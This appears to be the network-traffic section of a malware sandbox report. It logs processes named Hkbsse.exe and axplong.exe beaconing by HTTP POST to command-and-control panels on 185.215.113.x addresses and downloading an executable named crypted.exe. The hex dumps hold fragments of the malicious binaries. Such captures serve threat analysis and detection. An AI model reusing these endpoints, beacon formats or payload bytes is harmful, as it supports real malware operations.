                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL0Jh @ @`hK H.textH J `.rsrcL@@.relocd@BhH[*.((*0s~%:&~&s%(+o8[o%F~2(%G~2(%H~2(%e~2(~3(o8(ss~}~s(o}{I~2(o9I~2(8C~2(o:{~4(8{~5(
                                                                          Sep 27, 2024 04:21:21.116534948 CEST224INData Raw: 08 00 11 08 28 19 00 00 0a 16 fe 01 13 0a 11 0a 39 d1 03 00 00 00 11 08 16 6f 1a 00 00 0a 13 0c 12 0c 28 1b 00 00 0a 6f 1c 00 00 0a 11 08 16 17 6f 1d 00 00 0a 28 1e 00 00 0a 13 08 11 06 7b 02 00 00 04 7e 36 03 00 04 28 cf 05 00 06 13 0b 11 0b 28
                                                                          Data Ascii: (9o(oo({~6((9ssss ~%:&~'s!%(+s ~%:&~(s!%(
                                                                          Sep 27, 2024 04:21:21.116545916 CEST1236INData Raw: 00 00 2b 13 0f 11 06 fe 06 1d 00 00 06 73 20 00 00 0a 7e 08 00 00 04 25 3a 17 00 00 00 26 7e 04 00 00 04 fe 06 29 00 00 06 73 21 00 00 0a 25 80 08 00 00 04 28 02 00 00 2b 13 10 11 07 11 08 7e 37 03 00 04 28 d3 05 00 06 00 11 07 11 0b 7e 38 03 00
                                                                          Data Ascii: +s ~%:&~)s!%(+~7(~8(s"~%:&~*s#%(+~9(~:(s$~%:&~+s%%(+~;(
                                                                          Sep 27, 2024 04:21:21.116558075 CEST1236INData Raw: 28 13 06 00 06 7e 48 03 00 04 28 17 06 00 06 00 00 dd 09 00 00 00 13 09 00 00 dd 00 00 00 00 dd c3 00 00 00 00 11 07 11 07 7e 49 03 00 04 28 1b 06 00 06 28 36 00 00 0a 3a 11 00 00 00 11 07 7e 49 03 00 04 28 1b 06 00 06 38 0c 00 00 00 1f 3b 7e 32
                                                                          Data Ascii: (~H(~I((6:~I(8;~2(~E(~J((6:~J(8;~2(~F(~K(#(6:~K(#8;~2(~H(~K(#
                                                                          Sep 27, 2024 04:21:21.116569042 CEST1236INData Raw: 0a 28 3e 00 00 0a 20 40 42 0f 00 6a 5b 21 00 91 10 b6 02 00 00 00 59 7e 52 03 00 04 28 3f 06 00 06 00 25 11 05 11 06 19 7e 44 03 00 04 28 07 06 00 06 6f 35 00 00 0a 7e 53 03 00 04 28 43 06 00 06 00 25 11 05 11 06 20 9a 00 00 00 7e 32 03 00 04 28
                                                                          Data Ascii: (> @Bj[!Y~R(?%~D(o5~S(C% ~2(~T(G~G(~U(K~V(Oj92(?(@(A!Y~R(?:8~W(S(6
                                                                          Sep 27, 2024 04:21:21.116580009 CEST1236INData Raw: 23 ff ff ff 26 20 00 00 00 00 38 18 ff ff ff 11 12 3a 4f ff ff ff 38 ae 01 00 00 00 00 11 0f 11 06 16 7e 44 03 00 04 28 07 06 00 06 28 13 00 00 06 13 07 20 00 00 00 00 7e 2e 03 00 04 7b 23 03 00 04 39 0f 00 00 00 26 20 01 00 00 00 38 04 00 00 00
                                                                          Data Ascii: #& 8:O8~D(( ~.{#9& 8ED8: 8~[(c ~.{:& 8~D(( 8o%-(
                                                                          Sep 27, 2024 04:21:21.116591930 CEST1236INData Raw: 01 00 00 6f 01 00 00 09 00 00 00 16 00 00 01 1b 30 05 00 bc 01 00 00 08 00 00 11 38 16 00 00 00 fe 0c 00 00 45 02 00 00 00 7f 01 00 00 12 00 00 00 38 7a 01 00 00 00 7e 14 00 00 0a 13 07 38 09 00 00 00 11 07 13 05 38 67 01 00 00 00 00 02 16 28 15
                                                                          Data Ascii: o08E8z~88g(v@ ~.{:& 8Ep[8k=~2((I8b8 8~`(w ~.{:& 8
                                                                          Sep 27, 2024 04:21:21.116638899 CEST1236INData Raw: 02 00 04 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 06 00 45 02 00 00 00 05 00 00 00 a1 01 00 00 38 00 00 00 00 38 2e 00 00 00 38 00 00 00 00 16 d0 0b 00 00 01 28 4c 00 00 0a d0 02 00 00 02 28 17 00 00 06 28 18 00 00 06 28 4d 00 00 0a
                                                                          Data Ascii: :& 8E88.8(L(((M8~{N~~:880rp(L8%((O(P~{Q~~:884(8%(%(R
                                                                          Sep 27, 2024 04:21:21.116650105 CEST1236INData Raw: 00 0a 2a 2e 00 fe 09 00 00 28 34 00 00 0a 2a 2a fe 09 00 00 6f 35 00 00 0a 2a 00 3a fe 09 00 00 fe 09 01 00 6f 39 00 00 0a 2a 00 3a fe 09 00 00 fe 09 01 00 6f 1a 00 00 0a 2a 00 3e 00 fe 09 00 00 fe 09 01 00 28 59 00 00 0a 2a 2e 00 fe 09 00 00 28
                                                                          Data Ascii: *.(4**o5*:o9*:o*>(Y*.(L*N(_*>(R*0s,_~2((e(f`~2((e(f(49~b(og(49
                                                                          Sep 27, 2024 04:21:21.116660118 CEST1236INData Raw: 26 20 06 00 00 00 38 62 fe ff ff 11 03 3a d3 fe ff ff 20 07 00 00 00 38 51 fe ff ff 00 11 02 6f 71 00 00 0a 1f 64 7e 32 03 00 04 28 bf 05 00 06 28 36 00 00 06 13 0d 20 04 00 00 00 7e 2e 03 00 04 7b e6 02 00 04 3a 22 fe ff ff 26 20 02 00 00 00 38
                                                                          Data Ascii: & 8b: 8Qoqd~2((6 ~.{:"& 898k8 ~.{:& 8ootA88wu' ~.{:& 8E7+82o1 ~.{:
                                                                          Sep 27, 2024 04:21:21.116671085 CEST1236INData Raw: 03 00 04 28 e3 05 00 06 00 25 73 2e 00 00 0a 7e 3c 03 00 04 28 e7 05 00 06 00 13 07 11 07 7e 41 03 00 04 28 fb 05 00 06 16 fe 01 13 09 11 09 39 09 00 00 00 06 11 07 6f 2f 00 00 0a 00 00 12 03 28 30 00 00 0a 3a e4 fe ff ff dd 0f 00 00 00 12 03 fe
                                                                          Data Ascii: (%s.~<(~A(9o/(0:o1&o2:9o18*Adn&De7


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          15192.168.2.549729185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:20.639245033 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:21.314498901 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:21 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:21.327826023 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:21.555485010 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:21 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          16192.168.2.549730185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:21.670361996 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:22.369586945 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:22 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:22.764954090 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:22.992566109 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:22 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          17192.168.2.549731185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:22.772140026 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 31
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 64 31 3d 31 30 30 30 32 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                          Data Ascii: d1=1000254001&unit=246122658369
                                                                          Sep 27, 2024 04:21:23.491058111 CEST193INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:23 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 4 <c>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          18192.168.2.549732185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:23.270159960 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:23.985779047 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:23 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:23.989104986 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:24.228287935 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:24 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          19192.168.2.549733185.215.113.117805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:23.535099030 CEST56OUTGET /inc/crypted.exe HTTP/1.1
                                                                          Host: 185.215.113.117
                                                                          Sep 27, 2024 04:21:24.234410048 CEST1236INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:24 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 321536
                                                                          Last-Modified: Mon, 16 Sep 2024 13:46:13 GMT
                                                                          Connection: keep-alive
                                                                          ETag: "66e836a5-4e800"
                                                                          Accept-Ranges: bytes
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f2 26 e8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 dc 04 00 00 0a 00 00 00 00 00 00 0e fb 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 fa 04 00 57 00 00 00 00 00 05 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 7c f9 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL&f @ @`W | H.text `.rsrc@@.reloc @BHh7c73wV)J.:aW'=|Q&pIIoOgQP~CMv@P*Sla=:u?ED"Jp2rBH?v0]2>F}s6N.h#Z6g^guaW&2n?v*S}!^Ehdpfc4{/OIvQ,U>xKcD/E7.TtyfSC)Fm"2Ms3"KLezcBb-l\TYQB!?e]4/(554'[g
                                                                          Sep 27, 2024 04:21:24.234424114 CEST1236INData Raw: 24 0a b7 15 e6 e6 67 62 3b 65 aa ea 51 d3 e0 72 e5 85 91 47 65 28 61 3c c6 e3 9a 71 43 8c 4a d6 1e 77 03 81 ea 51 99 dc 19 df 94 c3 12 af 4a 2c 8a d2 c2 fb 79 62 77 d3 2e 49 7d 94 40 dd 1c 85 7b 6f d0 74 97 aa 82 15 82 74 3e dc 96 82 76 9f bc 4b
                                                                          Data Ascii: $gb;eQrGe(a<qCJwQJ,ybw.I}@{ott>vK@)X8R@["kQR[l*SvtSys)jK,z%8Ql]T8zGc]V3E'=Ss2^aq>pBI#t0= !ur;G\v?kLa-U
                                                                          Sep 27, 2024 04:21:24.234435081 CEST1236INData Raw: e0 0d 4b c5 22 19 ad 7c af 12 cc 22 0d 91 1f ed 91 eb 12 c9 43 26 10 79 f5 1b 4a e1 53 6a a4 9d 5f 70 bf a7 8c 40 c0 f8 3a b0 e5 48 e0 67 b8 73 38 c2 d2 20 d2 c3 7e 8b 9c 28 c4 8c 31 c4 54 16 a7 47 4d 2b 9b b2 61 47 fa f6 ba e4 1e 18 67 00 6b a1
                                                                          Data Ascii: K"|"C&yJSj_p@:Hgs8 ~(1TGM+aGgk5J5&@9Q"Nm.InA<"1]pNG|<<!/vh=c;MVx&M6&)~2g75`L8.d#NGPy
                                                                          Sep 27, 2024 04:21:24.234453917 CEST1236INData Raw: 63 4e 1a 75 8a ee e7 70 75 8f 79 e3 f1 89 ab b3 a7 5b e4 99 c8 f4 ff 8a 2f f7 bc f2 43 76 06 8a e4 b4 c6 ab cb 41 2d 56 3f 22 b9 21 72 a6 23 92 8e 0d 02 c7 db 8f 94 97 71 97 87 5a eb fa 33 b6 e4 77 27 bb 73 4a db c9 ee 5f a0 2d d0 fe 9d 9c 4b d6
                                                                          Data Ascii: cNupuy[/CvA-V?"!r#qZ3w'sJ_-K9J74;`]1<+qL`5hKCRcA(h6)NGf4JKP"@jW4X.("9uOLD(Xqn#ma89
                                                                          Sep 27, 2024 04:21:24.234464884 CEST896INData Raw: 20 e7 74 af 19 88 4b 99 b4 e3 5c 6d 68 eb 72 c6 ab 5d 43 7f db 25 fc 12 c2 7a a6 8f f1 90 cc b8 ab 7f 1f 13 c4 aa a0 78 0e 67 94 68 c0 f0 be 87 2e 9e 2f 4e f5 17 8e af dd 0b ba d6 20 66 5f f8 05 4b 8d 8e df 52 5f c7 76 12 44 30 22 5c b0 08 20 26
                                                                          Data Ascii: tK\mhr]C%zxgh./N f_KR_vD0"\ &U3(xuvjGmvf(.uOKM~`!mfUspYE>/{:b@&4l")8]t`ZwpBf9Lrh
                                                                          Sep 27, 2024 04:21:24.234476089 CEST1236INData Raw: 89 ab 58 97 05 b5 25 71 5c 76 08 90 e9 2c 29 26 9c 03 06 98 f8 27 6a ef 0c 57 21 a3 43 aa 2b 03 ed 58 9b 2f 34 d2 82 50 93 77 99 19 96 fd 12 3b 01 64 92 47 2c 71 74 62 7a 93 83 6d ac 4f 86 c8 d7 5e 7d 92 9d eb e4 b7 73 2e 8f ab 59 7c d0 cb e2 fd
                                                                          Data Ascii: X%q\v,)&'jW!C+X/4Pw;dG,qtbzmO^}s.Y|<n'0S0s_OKo}"|AawQsLl3H~?SuvxeWA&Z6[6Mb/|IOo>4MaLkK6'kpNiDT
                                                                          Sep 27, 2024 04:21:24.234487057 CEST1236INData Raw: 24 f0 7d a3 92 80 45 df 9f 6d 0f 3e 56 f1 2f 23 61 38 c6 ad 57 2b 8e cd fe 91 a4 c0 de 7b 21 a5 97 52 e5 cd 85 76 55 0f a2 11 1a 0c 89 55 e1 85 f0 d0 8d 75 3e 8a 0f b1 b0 87 3b 80 b4 37 60 b6 45 4e a7 7a 46 59 1d 47 35 e6 b9 aa 2d 41 b3 8f 09 03
                                                                          Data Ascii: $}Em>V/#a8W+{!RvUUu>;7`ENzFYG5-AB7G'O4F*)zgdn"_5q.5#yzH_$!:s|X[j=Tx_Tv%5!7AGnNFei8"olJ^rlsqMcJ
                                                                          Sep 27, 2024 04:21:24.234499931 CEST1236INData Raw: 7a 20 9f f6 95 eb 2b a0 fa b5 5c d6 c4 de ff 70 f4 7c ec 4e 65 3f f8 f9 f4 5a 2d fa e9 c9 9a 83 f9 9d f8 8f 88 95 eb 9f f6 25 75 5d dc 40 1b bb 4f 68 b8 ca e1 72 7b 5d 2e 39 ca 1a 32 28 20 af 59 31 98 cf 4c a1 32 69 dd 55 00 9d d4 1b c5 92 fb f8
                                                                          Data Ascii: z +\p|Ne?Z-%u]@Ohr{].92( Y1L2iUP-]D)xUW\y{MnU!LvF6Ic"G'qc6,gF#AS({b})s~LoGm,yBa>WWgh+#m.oL/Xj-^5
                                                                          Sep 27, 2024 04:21:24.234544992 CEST1236INData Raw: 59 b6 d0 d8 ff 52 9b 83 20 ab 9b 81 dd 74 17 3c 02 75 5b 1d 19 41 0c a6 5e 43 16 e6 1e 69 73 4e 8c 6c 6f f0 18 29 fd 29 55 65 8f d2 bc 8d d9 8d fe be bb b6 b2 10 d2 30 21 0b ca ea 91 4c 40 ae c9 ee 91 36 7b bb 00 46 f7 25 30 67 7a 55 65 e0 59 de
                                                                          Data Ascii: YR t<u[A^CisNlo))Ue0!L@6{F%0gzUeYsZvYrox[,;h"]&0=@&yO/]^['{J M4*;<`^8p#7T\E::f?!1zfo[vL<_X
                                                                          Sep 27, 2024 04:21:24.234558105 CEST1236INData Raw: d8 f5 30 7f 05 7b fd 9f 7f ef 9f 0c 7c 30 f2 6a 72 33 9b 8d ca 08 09 05 2f db d6 83 12 25 a7 08 35 ce a6 d0 ae 56 e0 ce 8e 26 76 a1 5c 17 41 ae 46 67 73 20 a0 ac c4 82 ff e9 79 22 d2 4e 83 5e 1a 93 b1 87 11 ff af 6b 96 a3 92 22 69 8e df 8b 71 95
                                                                          Data Ascii: 0{|0jr3/%5V&v\AFgs y"N^k"iq)w3=>]TY_X+8?^WkbSl;K1/i)zw*AdFt6|rsJvSH0CK:\varXBDLOb+zSS~:}
                                                                          Sep 27, 2024 04:21:24.239413023 CEST1236INData Raw: 09 8c 75 b4 94 12 b8 5a ff 76 0c 8c 54 2d d1 de ad eb ba 4f 73 04 e9 f1 29 b4 15 8a 37 19 40 79 0b a0 60 6b 14 30 f0 f6 8d c1 c3 3f ce bb 1f c2 be c1 99 eb 90 6a a9 85 80 50 ed 28 95 f5 f4 66 74 46 5a 23 19 b3 4c 27 0a cb b8 33 81 81 86 ce 66 0f
                                                                          Data Ascii: uZvT-Os)7@y`k0?jP(ftFZ#L'3faG>LPGTJFofnKO{+^tkxWtPg?Pb[S~x&{,yT@Lf`{(r1o#zY|afG<2pXJ1Ik4


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          20192.168.2.549736185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:24.355401039 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:25.066842079 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:24 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:25.395005941 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:25.632916927 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:25 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          21192.168.2.549737185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:25.767400980 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:26.481929064 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:26 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:26.493500948 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:26.725404024 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:26 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
